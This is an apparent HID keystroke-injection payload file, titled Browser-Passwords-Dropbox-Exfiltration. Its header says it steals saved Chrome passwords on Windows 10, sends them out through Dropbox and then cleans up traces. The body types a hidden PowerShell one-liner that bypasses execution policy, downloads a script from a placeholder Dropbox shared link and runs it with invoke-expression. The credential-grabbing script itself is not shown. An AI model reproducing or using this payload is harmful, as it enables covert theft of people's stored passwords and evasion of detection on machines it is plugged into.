Path: blob/master/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/Version 01/payload.txt
2971 views
REM #########################################################################################################1REM # | #2REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #3REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #4REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #5REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #6REM # Target : Windows 10 (PowerShell + Chrome) | |____/___| |_| |____(_) .__/ \__, | #7REM # Mode : HID | |_| |___/ #8REM # Props : I am Jakoby, NULLSESSION0X | #9REM # Description : Opens PowerShell hidden, grabs Chrome | #10REM # passwords, saves as a cleartext file and | #11REM # exfiltrates info via Dropbox. | #12REM # Then it cleans up traces of what you have done | #13REM # after. | #14REM #########################################################################################################1516ATTACKMODE HID1718DELAY 300019GUI r20DELAY 25021STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl2223REM Remember to replace the link with your DropBox shared link for the intended file to download24REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly252627